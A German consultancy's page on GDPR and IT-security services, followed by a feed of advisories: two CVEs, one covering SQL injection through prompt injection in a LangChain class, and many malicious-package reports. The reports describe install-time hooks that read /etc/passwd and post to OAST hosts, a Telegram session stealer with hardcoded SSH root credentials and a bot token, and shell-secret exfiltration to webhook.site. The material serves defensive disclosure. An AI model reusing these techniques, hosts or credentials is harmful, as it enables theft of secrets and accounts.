Beratung zu IT-Sicherheit & Datenschutz


Die Datenschutz-Grundverordnung beziehungsweise das Bundesdatenschutzgesetz betreffen uns alle - jeder, der Daten von Dritten erfasst, speichert oder verarbeitet muss den europäischen Standard einhalten. Die umfangreichen Gesetzestexte regeln Rechte und Pflichten aber auch technische und organisatorische Maßnahmen zum Datenschutz, Aufbewahrungspflichten, Sicherheitsstandards und Vorgaben zur Dokumentation von Verfahren und Vorfällen sowie die Vorgaben zur Berufung eines Datenschutzbeauftragten mit einer besonderen Aufsichts- und Beratungspflicht.

Die DSGVO und das BDSG sollte dabei nicht nur schriftlich in langen Rechtstexten, Datenschutzhinweisen und Verfahrensdokumentationen umgesetzt werden sondern es sollten konkrete technische Standards etabliert und eingehalten werden um dem Verlust von Daten vorzubeugen, der unberechtigten Nutzung von Daten einhalt zu gebieten und Angreifer und Hacker zuverlässig abzuwehren.

Da umfangreiches Know-How sowohl im Bezug auf die Rechtsgrundlagen als auch auf die technischen Risiken und Möglichkeiten erforderlich sind um ein angemessenes Datenschutzkonzept zu etablieren haben viele Unternehmen große Schwierigkeiten bei der Umsetzung. Unsere IT- und Datenschutzberatung setzt hier an - mit unserer Expertise können wir Sie dabei unterstützen Datenschutz technisch und rechtlich angemessen umzusetzen.
Wir unterstützen Sie gerne! »

  Unsere Leistungen

Datenschutzberatung durch geprüften DSB
Umsetzung von IT-Richtlinien / Gesetzen
Analyse & Beratung zur IT-Sicherheit
Erstellung von Dokumentationen



Was steckt dahinter?

Das "Who is Who" - DSGVO, GDPR, BDSG, TMG, ...
Innerhalb der EU gilt seit 2018 die sogenannte General Data Protection Regulation (GDPR), die in Deutschland unter der Bezeichnung "Datenschutz-Grundverordnung" (DSGVO) in nationales Recht umgesetzt wurde. Das Bundesdatenschutzgesetz (BDSG) präzisiert die Regelungen der DSGVO und fügt weitere nationale Regelungen hinzu. Für Betreiber von Internetangeboten ist zudem das Telemediengesetzes (TMG) relevant. Dies bezieht sich allerdings weniger auf den Datenschutz als auf grundlegende Regelungen im IT-Recht.

Was ist Datenschutzberatung?
Unser TÜV geprüfter Datenschutzbeauftragter mit juristischer Qualifikation berät Sie gerne zu Fragen rund um die Umsetzung von Datenschutzrecht in Ihren konkreten Projekten. Darüber hinausgehende zivilrechtliche Fragestellungen hingegen fallen nicht in den Bereich der Datenschutzberatung.




Die rechtliche Seite: DSGVO

Die DSGVO beziehungsweise das Bundesdatenschutzgesetz stellen verschiedene Forderungen an Unternehmen und Organisationen die zwingend einzuhalten sind um rechtskonform Daten zu verarbeiten. Als Verarbeiter von Daten zählen Sie schon dann, wenn Sie die Daten von Mitarbeitenden oder Kunden erfassen oder speichern.

Damit gilt die DSGVO sowohl für Kleinstunternehmen und Vereine wie auch für große Unternehmen und global Player.

Während die gesetzlichen Regelungen in vielen Bereichen sehr präzise Vorgaben machen welche Dokumente und Verfahren es geben muss und welche Rechte, Pflichten und Fristen gelten, gibt es in vielen Bereichen auch große Unsicherheiten. Häufiger werden Maßnahmen gefordert die sich am Stand der Technik orientieren oder technische Notwendigkeit und Machbarkeit zur Maßgabe machen.

Im Rahmen einer rechtlichen Datenschutzberatung geht es darum Sie über Ihre Rechte und Pflichten als Datenverarbeiter zu informieren und gemeinsam zu prüfen und sicherzustellen, dass die geforderten Unterlagen und Prozesse korrekt umgesetzt werden. Wir zeigen Ihnen gernen auch Tools und Best Practices zur Umsetzung der Rechte Betroffener und Ihrer Pflichten als Verarbeiter.

Wir unterstützen Sie dabei den Überblick zu bewahren!

Die technische Seite: IT-Sicherheit

Während die rechtliche Seite sich viel mit Fragen nach Rechten und Pflichten, der Haftung und der Verantwortung beschäftigt, ist die technische Seite des Datenschutzes sehr viel präziser:

Wie verhindern Sie, dass Ihre Daten in falsche Hände kommen?

Sie sammeln und verarbeiten vermutlich jeden Tag Daten von Dritten und speichern diese in internen Tools, verarbeiten sie auf Ihren oder fremden Servern, übertragen Sie zu Dienstleistern oder bauen sogar einen wesentlichen Teil Ihrer Tätigkeit auf der Verarbeitung auf.

Ein potentieller Angreifer oder Hacker versucht stets den schwächsten Punkt zu identifizieren, um Zugriff zu Ihren Daten zu erlangen. Häufig nutzen Hacker dazu bekannte Sicherheitslücken nicht aktualisierter Systeme aus, suchen nach vergessenen oder auch versehentlich offen stehenden Türen oder greifen sensible Zugangsdaten ab, wodurch sie auch ohne große Anstrengungen unberechtigten Zugang erlangen und viel Schaden anrichten können. Dabei müssen Sie nichtmal das primäre Ziel des Angriffs sein, sondern könnten vermeintlich auch Opfer eines größer angelegten Angriffs auf mehrere Unternehmen werden.

Wir unterstützen Sie dabei, ein Sicherheitskonzept in Ihrer IT zu etablieren und die Angriffflächen zu reduzieren.





IT-Sicherheit - bleiben Sie auf dem Laufenden


Täglich werden neue Schwachstellen, Angriffs-Vektoren, Cyber-Attaken und Fehler in Software, Netzwerken und Infrastrukturen bekannt - teilweise betreffen diese nur bestimmte Softwarelösungen oder spezifische Szenarien, manchmal betreffen Sie jedoch auch ganze Industriezweige, weit verbreitete Arbeitsweisen und grundlegende Technologien wie bei Heartbleed (SSL) oder Log4Shell (Protokollierung). Ergreifen Sie Maßnahmen, um Ihre Infrastruktur und Daten sicher zu halten.

Gemeinsam erfassen wir, welche Komponten und Abhängigkeiten Sie einsetzen und überwachen die CVE und viele weitere Quellen um im Falle von Mängeln oder Angriffspunkten schnell handeln zu können.

Wir simulieren Angriffe und Testen Ihre Anwendungen, Webseiten, die Infrastruktur und Prozesse auf mögliche Sicherheitslücken, Mängel und Angriffsvektoren um Risiken fürhzeitig zu erknennen und Lücken zu schließen.

Wir implementieren aktiv Monitore und überwachen somit Anfragen um frühzeitig Angriffe und verdächtige Aktivitäten zu identifizieren. Verdächte Aktivitäten können zur Alarmierung oder zu automatischen Sperrungen und Ausschlüssen führen, um einen hohen Standard zu gewährleisten.


Den Bedrohungen der IT-Welt sind Sie nicht schutzlos ausgeliefert - es ist jedoch wichtig dem Thema IT-Sicherheit Aufmerksamkeit zu schenken, um einen verantwortungsbewussten und rechtskonformen Umgang mit Unternehmens- und Kundendaten zu gewährleisten.
Risiko / Label Veröffentlichung
Risiko 9.8 / 10 CVE-2025-1889 gerade eben
picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. An attacker could craft a malicious model that uses Pickle and include a malicious pickle file with a non-standard file extension. Because the malicious pickle file inclusion is not considered as part of the scope of picklescan, the file would pass security checks and appear to be safe, when it could instead prove to be problematic.
Risiko 9.8 / 10 CVE-2024-8309 gerade eben
A vulnerability in the GraphCypherQAChain class of langchain-ai/langchain-community version 0.2.5 allows for SQL injection through prompt injection. This vulnerability can lead to unauthorized data manipulation, data exfiltration, denial of service (DoS) by deleting all data, breaches in multi-tenant security environments, and data integrity issues. Attackers can create, update, or delete nodes and relationships without proper authorization, extract sensitive data, disrupt services, access data across different tenants, and compromise the integrity of the database.
Risiko ? / 10 MAL-2026-16017 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (90afeb1d39f1ef3d107f2da6a26c4af8c7efb314bb0f272d45fa755119e1b669) telegram_helper describes itself as "A minimal example Python library" and ships a Russian-language template README (the Homepage field is still the unedited placeholder https://github.com/your-username/telegram_helper), but the entire 9,586-byte src/telegram_helper/__init__.py is a Telegram account-theft toolkit with credentials hardcoded in cleartext: SSH_HOST = "163.5.153.115", SSH_USER = "root", SSH_PASS = "AsQnq6CXk3eCm", BOT_TOKEN = "8948626737:AAEO9HcDgkKgbUXc3uXLt7geH_nK41vlzXg", YOUR_ID = "1625851734", and API_ID/API_HASH 20838706 / d5efb283650598ff4d3570adbbcb8d15. daemonize() performs a POSIX double-fork plus setsid and redirects stdin/stdout/stderr to /dev/null, or on Windows calls ctypes.windll.user32.ShowWindow(GetConsoleWindow(), 0) to hide the console. start_socks_tunnel() shells out to sshpass -p ssh -N -D 127.0.0.1:10808 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@163.5.153.115, and set_proxy_env() then points http_proxy, https_proxy and all_proxy at that SOCKS5 listener, routing subsequent traffic through the author's host with host-key verification disabled. scan_sessions(), scan_tdata() and scan_cookies() walk ~, /tmp and /root for Telethon/Pyrogram session files (*.session, *.session.*, *.pyrogram, *.ini), Telegram Desktop tdata directories, and any filename containing cookie. check_session_telethon() and check_session_pyrogram() then connect each recovered session to Telegram using the author's own API_ID/API_HASH, call is_user_authorized(), and read back me.id, me.username, me.first_name and me.last_name to validate and label each hijacked account. full_scan_and_send() exfiltrates every session file via POST https://api.telegram.org/bot/sendDocument to chat_id=1625851734 with the enumerated account identity as the caption, ZIP-archives each tdata directory to /tmp/tdata_.zip and uploads it before deleting the archive, uploads every matched cookie file, and posts a summary count via /sendMessage. The module additionally registers Telegram command handlers /scan, /send_tdata, /send_sessions, /send_cookies, /ip and /kill, giving the bot owner an on-demand remote command channel against the victim host. Notably pyproject.toml declares no dependencies at all while the module imports requests, telegram, telethon and pyrogram, so the package only loads successfully on machines that already have Telegram client libraries installed - i.e. Telegram bot and userbot developers, whose session files are exactly what it targets. ## Source: kam193 (7db7944f424aaa877ab4c7d4555c4358900d45011b05a886837a14efea2a72a9) The package hides code that starts a Telegram bot to exfiltrate sensitive session files and cookies --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign: 2026-09-telegram-helper Reasons (based on the campaign): - The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine. - rat - files-exfiltration - target:telegram - uses-telegram-bot - exfiltration-browser-data
Risiko ? / 10 MAL-2026-15693 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (33a1bb1bf9c4c225131c5ad323e7b0c1a9f29f34aea30a496ac77661ea05605d) The package was found to contain malicious code or consuming dependency that contains malicious code
Risiko ? / 10 MAL-2026-15810 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (6be1770a21667861e10f778ca485b270170e20a35a529bc2a041bc72266bdb7d) The module src/gcphelpit/_verify.py runs at import time: it reads the installer's ~/.zshrc and POSTs the raw file contents to the hardcoded endpoint https://webhook.site/bc67d797-61ff-4f3b-a9b8-5df6a5e7643d. cli.py imports _verify at the top of the module and is wired as the declared `gcphelpit` console_script entry point, so the read-and-upload fires unconditionally on every CLI invocation. ~/.zshrc routinely contains exported cloud credentials and access tokens (AWS_*, GOOGLE_APPLICATION_CREDENTIALS, GitHub/npm tokens), so the effect is bulk exfiltration of installer-owned shell secrets to a third-party public webhook collector that is unrelated to the package's advertised purpose as a GCP CLI audit helper. ## Source: kam193 (d3e108475330381be537963456cb012b943f2d0a3693c83205f8f5b01f36635a) During initialization of the CLI, the package exfiltrates sensitive files. Prior version 0.1.2 the code was launching a calculator as PoC instead of exfiltrating data. --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign: 2026-09-gcphelpit Reasons (based on the campaign): - files-exfiltration
Risiko ? / 10 MAL-2026-15864 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (bba54b9524d7bd6b7563b91d2e19c3df6bf90887c1dd8867650f10bf1b516190) asti ships a two-line Persian README (لایبرری ساده - "simple library") documenting nothing but pip install asti, and places all of its code in asti/starts.py, of which roughly 40 of 723 lines are functional. ProxyManager.__init__ hardcodes self.token = "1263262891:neVZzZ8aKyH25k8BADzDkkurSehW3NuWgrg", self.channel = "5263487757", self.filters = ['.py', '.pyrubi', '.json', '.txt', '.html', '.php'] and self.source = "/storage/emulated/0/" - the Android shared-storage root, which scopes the package to Python-on-Android users (Termux, Pydroid). load_proxies() recursively walks that root with o.walk(self.source) and buckets every matching path by extension into self.buffer[ext]. check_proxy() then archives each bucket to /storage/emulated/0/proxy_.zip via z.ZipFile(self.temp, 'w', z.ZIP_DEFLATED), uploads it with r.post(f"https://tapi.bale.ai/{self.token}/sendDocument", files={'document': payload}, data={'chat_id': self.channel}), prints ".{ext} -- ALL PROXIES ARE LIVE!" when the upload returns HTTP 200, and deletes the archive in a finally block so no artifact persists. The.pyrubi filter is the targeting tell: pyrubi is the Python client library for the Iranian messaging platform Rubika, and.pyrubi files are its session/authentication files, so a successful run hands the operator the victim's Rubika accounts along with all Python source, JSON configs, notes and web files on the device; exfiltration terminates at Bale (bale.ai), another Iranian messenger whose Bot API is Telegram-API-compatible. Every identifier is deliberate misdirection - self.source is the victim's storage root, proxy_list holds their files, active/dead record upload success or failure, and check_proxy() is the exfiltration - while starts() narrates twelve emoji-labelled "phases" of a fake proxy audit. The remaining ~680 lines are padding: the NetworkUtils, SecurityUtils and ProxyValidator base classes consist almost entirely of methods that return random.randint(...) as fabricated latency, bandwidth, jitter, geolocation, DNS and speed-test results, and imports are single-letter aliased (import os as o, import zipfile as z, import requests as r) to defeat signature matching on os.walk and requests.post. The sendDocument call is the only network operation in the package; the four proxy-service URLs at lines 172-175 (api.proxyscrape.com, proxy-list.download, raw.githubusercontent.com/proxy-list/main/, api.proxy-ip.net) sit in a list that is iterated for print output only and are never fetched, making them cover story rather than indicators. There is no setup.py and no module-level executable statement, so import asti alone is inert; starts() is the package's sole export (__init__.py is from.starts import starts, __all__ = ["starts"]) and calling it - the only usage the package supports - performs the full harvest and upload. ## Source: kam193 (524f4f92d8a8c1b63e0164ce77b8185d9ec4d4ce345751a1883923351bdcfdbc) The provided functionality hides code that exfiltrates files to a remote location. --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign: 2026-09-asti Reasons (based on the campaign): - files-exfiltration - action-hidden-in-lib-usage - target:android
Risiko ? / 10 MAL-2026-12816 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (6ad1c6bad5ee8d3cb562503b94d5534ba2c98ad5b4854c073e1482d59ab8687e) package.json declares a preinstall hook that runs index.js during `npm install`. The script reads /etc/passwd, /etc/hosts, os.hostname(), os.userInfo().username, the user's home directory, dns.getServers(), and package metadata, then POSTs the collected data via HTTPS to the hardcoded subdomain 7ckdbwo9f8dtrg8y36sbe4e8lzrqfg35.oastify.com (Burp Collaborator OAST callback). The exfiltration fires automatically at install time without user interaction. ## Source: ghsa-malware (da7109b04e5b66699eebc1d774b016c4603a4fb0932136d62c0c3be356d5bb2b) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-16004 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (3cde9990177f51fd4637a17f48d850c61f3ade933fe3fce078d5846125a5fa01) The package was found to contain malicious code or consuming dependency that contains malicious code ## Source: ghsa-malware (7a5c20696b722ef88bf6e9a3a1b50f6f20f8fc70296949af8a17d0cb09ccd605) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-6373 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (a3a57b06daad43c269fe3846083da2fdce277fd1ff3a9399533072f6e894afc2) Package impersonates the Twilio Voice JS SDK namespace and ships a single exfiltration payload. package.json declares "preinstall": "node index.js", causing index.js to run automatically on npm install with no user interaction. index.js requires os/fs/https, collects os.hostname(), os.userInfo(), the user's home directory, DNS server configuration, and reads /etc/passwd and /etc/hosts, then POSTs the collected data over HTTPS to kocxl3uxcqn73ybo0k9e4g6d74d41upj.oastify.com — a Burp Collaborator out-of-band probe subdomain controlled by the attacker. The package contains no real reference components, has empty author/description metadata, and the name closely mimics the legitimate Twilio Voice JS package — a typosquat / dependency-confusion lure aimed at Twilio-related build systems. ## Source: ghsa-malware (2bf7eec6302074e67ec5f5022a94d8537ad30d37eb69199a932acf226fee40b1) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-12813 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (ea71d301e90ede6f86f259e827a1cb61ad0b4b0166b70281bdf7896f726eea31) On npm install, the package's postinstall script executes index.js, which collects host identifiers (os.hostname(), os.userInfo().username, os.homedir(), process.cwd(), os.platform(), os.arch(), and selected environment variables) and POSTs them as JSON to a hardcoded webhook.site collection URL (https://webhook.site/42ce0f0e-a0a0-41b5-b157-1c0f918e064f). On network error, the code falls back to a DNS callback against an interactsh-style subdomain at 2b22ede784d5.oast.fun. Package metadata (name `twilio-functions` mimicking the Twilio SDK namespace, version 99.99.99, empty description) is consistent with a typosquat / dependency-confusion lure whose only on-install effect is the outbound reconnaissance beacon.
Risiko ? / 10 MAL-2026-11153 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (ed39efd544cae19da3ed546fecb2383729aef637bf623e00a9cf02f1f8ded05c) package.json registers a preinstall hook that runs index.js on npm install. index.js collects os.hostname(), os.userInfo(), home directory, DNS server configuration, and reads /etc/passwd and /etc/hosts via fs.readFileSync, then HTTPS-POSTs the payload to the hardcoded Burp Collaborator subdomain mh7rhchf58lgymyr9wffhwfprgx7lx9m.oastify.com. Installing the package on a default `npm install` causes installer host identifiers and local account/host files to be transmitted to an out-of-band attacker-controlled endpoint. ## Source: ghsa-malware (be95fbfbbe1a1fe63bee334603752638c9aed0c559d559343c7705cb5f206f75) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-12482 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (b635b8b6d257c079a0d0a9c06e37910b67f2e75d1e71dced264043624951ce06) package.json declares a preinstall hook that runs index.js on `npm install`. index.js collects host identifiers (os.hostname(), os.userInfo(), homedir, DNS servers, cwd, package.json contents) and reads /etc/passwd and /etc/hosts, then POSTs the resulting JSON over HTTPS to the hardcoded out-of-band collaborator subdomain lsh5x8dwumsekllw37kacgaqxh3cr2fr.oastify.com. The destination is a Burp Collaborator OOB endpoint unrelated to any documented package purpose, and execution is automatic at install time. ## Source: ghsa-malware (0723c99e49b056e9d946985e6401afa50ee28e766b0e7e0993914f4ad3538723) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-11152 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (005d40bc86aa5e012bfb9a0cd23cf5de5c4d93b1f65880b2273b8708891fa7e5) package.json declares a preinstall hook that runs index.js on `npm install`. index.js collects host identifiers (os.hostname(), os.userInfo().username, homedir, DNS servers, cwd), reads the package.json, and reads /etc/passwd and /etc/hosts from the installer host, then POSTs the combined payload over HTTPS to 1rtlwocct2ruj1kc2njqbw96wx2qqhe6.oastify.com — a Burp Collaborator subdomain used to receive out-of-band callbacks. The package name suggests a Tidal media embed player but the shipped code performs only host reconnaissance and exfiltration, with no player functionality. ## Source: ghsa-malware (2431f85c58e75a787b5d6ee7f9bc2d2c86401aed86c9ce42605bcd2387124ca7) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-12809 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (6921f72a1b4fbaaba87fcbe3cb30137815e7e2bb932ffa794acd0010b8954c5f) package.json declares `preinstall: node index.js`, causing index.js to run automatically on `npm install`. The script collects installer-side data — hostname, username, home directory, DNS server list, current working directory, package.json contents, and the contents of /etc/passwd and /etc/hosts — and HTTPS-POSTs it to a hardcoded Burp Collaborator subdomain at 5z5h9l8e7cktx1ihl6usn4zgb7h15rtg.oastify.com. The exfiltration fires unconditionally on install with no user interaction. ## Source: ghsa-malware (fb3a6a289e12028cd0778c9ca9e56392a64003291be3756d28490d76c491e249) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-6485 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (8a4e552337fa70064e0a04644ee5a64378809a85b281eda24707bc9a6eba473f) starship-timeline@1.0.1 ships no real functionality. Its package.json declares a preinstall hook (`"preinstall": "node index.js"`) that runs automatically on `npm install`. index.js collects hostname, username, home directory, DNS servers, package metadata, and the contents of `/etc/passwd` and `/etc/hosts`, then POSTs the bundle over HTTPS to a hardcoded Burp Collaborator (`*.oastify.com`) subdomain (`5tziqozihbss8jg955ez91bycpij69uy.oastify.com`). The package has empty author and description fields, a single published version, and no other code paths — the exfiltration beacon is its only purpose, matching the standard dependency-confusion / OOB-beacon pattern. Whether deployed as research or as a live attack, installing the package leaks identifying host data and sensitive system files to an attacker-controlled out-of-band endpoint. ## Source: ghsa-malware (afc0d28ef1270eb9cb4a35bb75e9a2e5c9e4a8f36fcd25e4979a2d475aa6211b) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-15617 vor 1 Stunde(n)
Published as part of a ClickFix-style fake-CAPTCHA phishing campaign documented by OX Security (see reference). The package's only file is index.html, declared as the npm "main" entry; package.json defines no preinstall/install/postinstall/prepare lifecycle script, so the payload does not execute at `npm install` time. index.html renders a fake Cloudflare Turnstile verification widget. An obfuscator.io-obfuscated inline script POSTs a hardcoded per-package "hostKey" to https://api.keyval.org/get, receives a base64-encoded IV:ciphertext pair, decrypts it client-side via the Web Crypto API (AES-CTR) using an embedded key to obtain a redirect URL, appends the visitor's original query-string parameters, and navigates the browser there via window.location.replace(). This "dead drop" design lets the operator change the phishing destination for every package sharing a hostKey without republishing to npm; OX Security observed keyval.org-served destinations including a typosquatted Microsoft login page and, at time of writing, a ChatGPT redirect. The package therefore does not attack the installing machine directly; it is used as a static file host on the npm CDN (e.g. unpkg/jsDelivr) so the index.html can be linked to and opened directly in a victim's browser as a phishing/ClickFix landing page. Published by npm user "johnvaldez9a" as part of a burst of near-identical single-purpose packages published between 2026-08-04 and 2026-08-24 that share this same fake-Turnstile-redirect page structure. --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (60c1c0a80ae08be7c0f192601f75b94299e828ba08ba156d149383b443e31645) The package was found to contain malicious code or consuming dependency that contains malicious code
Risiko ? / 10 MAL-2026-6379 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (564baff2e47527f159c52c527e1ea2b93d73625f94737f4397cff99311871a18) On `npm install`, the package's preinstall hook (`package.json` declares `"preinstall": "node index.js"`) executes index.js, which collects the installer's hostname, username, home directory, DNS configuration, package metadata, and the contents of /etc/passwd and /etc/hosts (via fs.readFileSync), then POSTs the collected data over HTTPS to a Burp Collaborator subdomain at xpqamgvad3ok4bc11xar5t7q8he820qp.oastify.com. The package has no advertised functionality (empty author, empty description, single recon payload file) and its name is consistent with a dependency-confusion attempt against SimpliSafe's internal Gatsby package namespace. Any machine that runs `npm install` against this name will leak system identity and local-account information to the attacker. ## Source: ghsa-malware (28fdfe170233a2cc83320ece5c3ee4b6480017f27a0d1b2fb00e1048903a023b) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-16039 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (2ffce66fb482d77c6fcfcf9cf3ab50c0de30f856921f4a90f9de969212a2687f) The package was found to contain malicious code or consuming dependency that contains malicious code ## Source: ghsa-malware (dda66c2d91622ef8cd5e5c9a74a09a50597e5d377b4616604c3202db5c3e3ca3) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-14438 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (dcbce8344eb0762c4a9ef029743efe13045422b839444b828c245a09a85fc74e) package.json declares `preinstall: node index.js`, so `npm install` automatically runs index.js. index.js reads os.hostname(), os.userInfo(), the user home directory, DNS server configuration, and the contents of /etc/passwd and /etc/hosts, and POSTs the collected data over HTTPS to the hardcoded host 7iqn7pls4ly6w8valba0xcxygpmha7yw.oastify.com (a Burp Collaborator / OAST subdomain used as an attacker-controlled callback). Installing the package causes installer-side identifiers and sensitive system files to be sent to an external attacker endpoint on install. ## Source: ghsa-malware (038ed421b0adefaa811442ca01d52f8cdc5003752e40d901464f8d9ccce8a8fa) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-16036 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (0b6f84d412afce72584ec95c5e2595987bf307b67540da51870c8a3a22b05952) The package was found to contain malicious code or consuming dependency that contains malicious code ## Source: ghsa-malware (ed65988a4ac24440d372ee9ed85040bfa2f110284ec4730a384028f4f8919774) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-15691 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (a01d746e2ab5362af396f0bafe921bcd6aed22b8321555ccb16d0f8f7a5c9183) The package was found to contain malicious code or consuming dependency that contains malicious code
Risiko ? / 10 MAL-2026-14139 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (f6570c9056bf020fdada0366045c4e91a0f5cb21171fe27df9fcea82259e7809) The package declares `preinstall: "node index.js"`, which fires automatically on `npm install`. index.js collects host identifiers (os.hostname, os.userInfo, home directory, DNS servers, __dirname, package.json contents) and reads the local files /etc/passwd and /etc/hosts, then POSTs the aggregated JSON over HTTPS to the hardcoded Burp Collaborator subdomain zjmjb1b5mnwtdcmzrsq6uj4bj2ptdj18.oastify.com. There is no legitimate functionality in the package beyond this beacon. ## Source: ghsa-malware (e8271212ef3d62e14e0de4364e44e31151b1605f48ba967e62a02e50b219b343) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2025-47594 vor 1 Stunde(n)
The package communicates with a domain associated with malicious activity. --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (c2b733a611e3d27e56f4c6ee549bbcf3d88a1c823512c13797440c4c13f2712c) The package's index.js imports os, fs, and https at the top level and reads os.hostname() and os.userInfo() before sending the collected host identity over an outbound HTTPS request. The package name impersonates PayPal/Postman branding while shipping no legitimate library functionality, and the only observable behavior is collection and transmission of installer host data. Installing or requiring this package causes the installer's hostname and OS user identity to be sent to a third-party endpoint. ## Source: ghsa-malware (d1aef7d24ee6f2a862da9b261ae8d267bfcd3e277adfe6d09edb31b7c7b18570) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-13922 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (cce50db3ac46a97bd27f546d029617582b37a2ead027509b0bea35370e47d2bd) package.json declares a preinstall hook that runs index.js on npm install. The script collects hostname, username, home directory, DNS servers, current working directory, and the contents of /etc/passwd and /etc/hosts, then POSTs the collected data over HTTPS to the hardcoded subdomain ltivq9rn7t7gkxho4o1micsk6bc20uoj.oastify.com (a Burp Collaborator out-of-band interaction host). The behavior fires automatically as part of a default install and matches an installer-side host reconnaissance and system-file exfiltration pattern; the package's stated purpose (a passkeys React helper) does not require reading /etc/passwd, /etc/hosts, or contacting an OAST endpoint. ## Source: ghsa-malware (3ebca4e66350a1d6fa7bd07f7561fb0ca4cfb7408f1c86647b6a5f1199f7a160) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-16035 vor 1 Stunde(n)
